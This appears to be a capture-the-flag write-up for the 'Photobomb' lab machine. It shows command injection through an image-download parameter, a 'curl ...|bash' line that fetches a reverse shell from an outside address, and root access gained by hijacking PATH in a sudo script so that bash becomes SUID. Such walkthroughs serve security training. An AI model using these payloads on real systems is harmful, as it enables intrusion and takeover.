Photobomb
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.228.60
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-06 10:14 EDT
Warning: 10.129.228.60 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.228.60
Host is up (0.0056s latency).
Not shown: 51828 closed tcp ports (conn-refused), 13705 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
We have to add photobomb.htb
to our /etc/hosts
file to view port 80
JS Credentials
The webpage looks like a corporate page:

When we click the link, it redirects us to some gallery.

Since the page mentions there are credentials, we can view the page source to find photobomb.js
containing some credentials:
function init() {
// Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:b0Mb!@photobomb.htb/printer');
}
}
window.onload = init;
These credentials don't tell me anything new, so let's move on. At the bottom of the gallery, we can download images.

Here's the request generated when we download a photo:
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg&dimensions=3000x2000
I didn't know how this was handling photos, but the long processing time between requests indicates to me that these photos might be dynamically generated instead of having all the possible combinations of photos stored on the website. This means that the parameters could be passed into a command, and then the image is returned.
I tried some basic command injection, and found that the filetype
parameter was vulnerable:
POST /printer HTTP/1.1
Host: photobomb.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 102
Origin: http://photobomb.htb
Authorization: Basic cEgwdDA6YjBNYiE=
Connection: close
Referer: http://photobomb.htb/printer
Upgrade-Insecure-Requests: 1
photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;curl+10.10.14.13/rcecfm&dimensions=3000x2000

With this, we can use curl 10.10.14.13/shell.sh|bash
to get a reverse shell.

We can then grab the user flag from the home directory.
Privilege Escalation
Sudo Privileges
The user is able to run a script as root
.
wizard@photobomb:/tmp$ sudo -l
Matching Defaults entries for wizard on photobomb:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
(root) SETENV: NOPASSWD: /opt/cleanup.sh
SETENV just means that the current environment is used instead and that we can specify the environment variables before running the command:
Here's the script:
wizard@photobomb:/tmp$ cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb
# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
/bin/cat log/photobomb.log > log/photobomb.log.old
/usr/bin/truncate -s0 log/photobomb.log
fi
# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;
The find
binary does NOT have an absolute path, which means we can create a binary called find
that executes a reverse shell and change our PATH variable to execute it first.
First, create a file called find
with a malicious command:
$ cat find
#!/bin/bash
chmod +s /bin/bash
Afterwards, download this to the machine and make it executable. Then, just run this:
sudo PATH=$PWD:$PATH /opt/cleanup.sh
This would make /bin/bash
an SUID binary.

Rooted!